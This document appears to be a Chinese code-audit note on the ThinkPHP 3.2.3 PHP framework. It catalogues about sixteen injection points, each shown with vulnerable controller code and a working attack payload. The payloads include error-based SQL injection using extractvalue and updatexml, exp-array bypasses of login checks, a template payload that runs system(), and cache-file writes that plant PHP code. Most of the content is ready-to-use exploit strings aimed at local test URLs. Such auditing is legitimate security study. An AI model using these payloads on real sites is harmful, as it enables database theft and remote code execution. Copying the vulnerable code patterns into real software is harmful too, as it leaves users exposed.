thinkphp3.2.3代码审计

<?php
namespace HomeController;
use ThinkController;
class UserController extends Controller {

    public function index(/*$id*/)
    {
// S('a',I('id')); //http://127.0.0.1/tp/index.php/home/index/test?id=%0Aphpinfo%28%29//
//在Temp生成文件   生成的文件名字可到cmd5破解
<?php
//000000000000s:12:"
phpinfo()//";
?>
//       F('key','<?php phpinfo();?>');  14.生成缓存文件，在 runtime/key.php
        $this->display();
/*
//        $name = $_GET['name'];
//        $this->assign($name);            13.模板问题  http://127.0.0.1/tp/index.php/home/user/index?name[_content]=<?php system('type index.php');;?>
//        $this->display('index');       //'TMPL_ENGINE_TYPE'      =>  'php'才有效，默认是Think

//        $map['id'] = 5;
//        $map['_query']='username=afanti&score=10';   //12._query参数可控SELECT * FROM `thinkphp_user` WHERE `id` = 5 AND ( `username` = 'afanti' AND `score` = '10' )
//                $data = M('user')->where($map)->select();
//        dump(data);
//        $map['id'] = I('id');
//        $map['_string'] = 'username='."'".I('username')."'";   //12组合注入  http://127.0.0.1/tp/index.php/home/user/index?id=5&username=afanti   SELECT * FROM `thinkphp_user` WHERE `id` = 5 AND ( username='afanti' )
//        $data = M('user')->where($map)->select();
//        dump(data);

//        $user = M("user");                                //11.setInc注入
//        $user->where('id=5')->setInc('sorce'.I('num'));

//        if(intval($id)>0)
//        {                                   //10、参数传递注入 publics+functions+[w_]+($
//            $data = M('user')->where('id='.$id)->select();  //?id=1) 直接绕过判断
//            dump($data);
//        }
//        $map = array();
//
//      $data = array();
//    $data['user'] = $_POST['username'];    
//    $data['pass'] = md5($_POST['password']);             9.exp username[0]=exp&username[1]=aa'or 1=1%23&password=1
//    M('user')->where($data)->find();
//
//      $res = M('member')->where(array('id'=>$_GET['userid']))->count();   9.exp  userid[0]=exp&userid[1]=aaaaaa
//
////        $map['id']=I('id');   //这样exp不可以
//        $map['id'] = $_GET['id'];            //9.exp 注入http://127.0.0.1/tp/index.php/home/user/index?id[0]=exp&id[1]=aaaaaa
//        $data = M('user')->where($map)->select();
//        dump($data);
//        M('user')->count(I('par'));              //8聚合函数 SELECT COUNT(*) AS tp_count FROM `thinkphp_user` LIMIT 1   ?par=*
//                                       //8.query,execute支持原生的sql语句 聚合函数
//$Model->index(I('user'))->select();   //7.索引注入
//        M('user')->comment(I('comment'))->where('1=1')->select();  //6.comment SELECT * FROM `thinkphp_user` WHERE ( 1=1 ) /* 111111111 */    comment=111111111
//        M('user')->where('1=1')->order(array('id'=>I('orderby')))->select(); //5.order,group,having参数可控  SELECT * FROM `thinkphp_user` WHERE ( 1=1 ) ORDER BY `id` asc  ---?orderby=asc
//          M('user')->field(I('id'))->union('select 1 from thinkphp_user')->select();          // 4.->(alias|join|union)s*(($|$_|I)  用正则查找 alias|join|union参数可控制
//        M('user')->field(I('id'))->where('1=1')->select();    //3.SELECT `id` FROM `thinkphp_user` WHERE ( 1=1 )  id可控
//         M('user')->field(array('id','username'=>I('name')))->select(); //3.field SELECT `id`,`username` AS `uname` FROM `thinkphp_user`  //别名 ?name=uname`a报错
//            M()->table(I('biao'))->where('1=1')->select();  //2.table ?biao=thinkphp_user where 1=1 and 1=(extractvalue(1, concat(0x7e, (select @@version),0x7e)))-- -a 表名必须存在
//          $data = M('user')->where("id=".I('id'))->select(); //1.where后直接直接拼接会产生注入
//          dump($data);
//        $data = I('id','1','intval');
//        echo $data;              //URL_PARAMS_BIND == true
//        echo $id;              //参数绑定 http://127.0.0.1/tp/index.php/home/user/index/id/11111111 传入11111
//        echo "usercontroller";

    }

}

1.where后直接直接拼接会产生注入

$data = M('user')->where("id=".I('id'))->select();

2.table ?biao=thinkphp_user where 1=1 and 1=(extractvalue(1, concat(0x7e, (select @@version),0x7e)))-- -a 表名必须存在。

M()->table(I('biao'))->where('1=1')->select();

3.

M('user')->field(I('id'))->where('1=1')->select(); //3.SELECT `id` FROM `thinkphp_user` WHERE ( 1=1 ) id可控导致注入

M('user')->field(array('id','username'=>I('name')))->select(); //3.field SELECT `id`,`username` AS `uname` FROM `thinkphp_user` //别名 ?name=uname`a报错

4.->(alias|join|union)s*(($|$_|I) 用正则查找 alias|join|union参数可控制

M('user')->field(I('id'))->union('select 1 from thinkphp_user')->select();

5.order,group,having参数可控 SELECT * FROM `thinkphp_user` WHERE ( 1=1 ) ORDER BY `id` asc ---?orderby=asc

M('user')->where('1=1')->order(array('id'=>I('orderby')))->select();

6.comment注入 SELECT * FROM `thinkphp_user` WHERE ( 1=1 ) /* 111111111 */ comment=111111111

M('user')->comment(I('comment'))->where('1=1')->select(); 

7.索引注入

$Model->index(I('user'))->select();

8.query,execute，聚合函数支持原生的sql语句 

M('user')->count(I('par')); //聚合函数 SELECT COUNT(*) AS tp_count FROM `thinkphp_user` LIMIT 1 ?par=*

9.exp注入

a.)

$data = array();

$data['user'] = $_POST['username']; 

$data['pass'] = md5($_POST['password']); payload: username[0]=exp&username[1]=aa'or 1=1%23&password=1

M('user')->where($data)->find();

b.)

$res = M('member')->where(array('id'=>$_GET['userid']))->count();   payload:  userid[0]=exp&userid[1]=aaaaaa

c.)通过I函数exp注入就不存在了

$res = M('member')->where(array('id'=>$I('userid')))->count();

10、参数传递注入 publics+functions+[w_]+($

public function index(/*$id*/)....

if(intval($id)>0)
{
 $data = M('user')->where('id='.$id)->select(); //?id=1) 直接绕过判断
 dump($data);
}
11.setInc注入

$user = M("user");
$user->where('id=5')->setInc('sorce'.I('num'));

12.组合注入

http://127.0.0.1/tp/index.php/home/user/index?id=5&username=afanti 

SELECT * FROM `thinkphp_user` WHERE `id` = 5 AND ( username='afanti' )

$map['id'] = I('id');
$map['_string'] = 'username='."'".I('username')."'"; 
$data = M('user')->where($map)->select();
dump(data);

13、_query参数可控

SELECT * FROM `thinkphp_user` WHERE `id` = 5 AND ( `username` = 'afanti' AND `score` = '10' )

$map['id'] = 5;
$map['_query']='username=afanti&score=10'; //12._query参数可控SELECT * FROM `thinkphp_user` WHERE `id` = 5 AND ( `username` = 'afanti' AND `score` = '10' )
$data = M('user')->where($map)->select();
dump(data);

14、模板问题：http://127.0.0.1/tp/index.php/home/user/index?name[_content]=<?php system('type index.php');;?>

$name = $_GET['name'];
$this->assign($name); 
$this->display('index'); //'TMPL_ENGINE_TYPE' => 'php'才有效，默认是Think

15、在runtime/key.php

S('a',I('id')); //http://127.0.0.1/tp/index.php/home/index/test?id=%0Aphpinfo%28%29//
在Temp生成文件 生成的文件名字可到cmd5破解
<?php
//000000000000s:12:"
phpinfo()//";
?>
F('key','<?php phpinfo();?>'); 
$this->display();

thinkphp3.2.3

跨控制器的方法R：

public function test()
{
echo "test";
echo I('name');

 $data = M('user')->where('id=1')->select();
 $a = A('User');
 $a->index();
 R('User/index'); //跨控制器
 dump($data);
}

 16.select、find、delete注入

public function test()
    {
       $id = i('id');
       $res = M('user')->find($id);
       //$res = M('user')->delete($id);
       //$res = M('user')->select($id);
    }
注入的payload:

table：http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[table]=user where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
alias：http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[alias]=where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
where: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
delete方法注入payload:

where: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
alias: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[where]=1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--
table: http://127.0.0.1/index.php?m=Home&c=Index&a=test&id[table]=user%20where%201%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)--&id[where]=1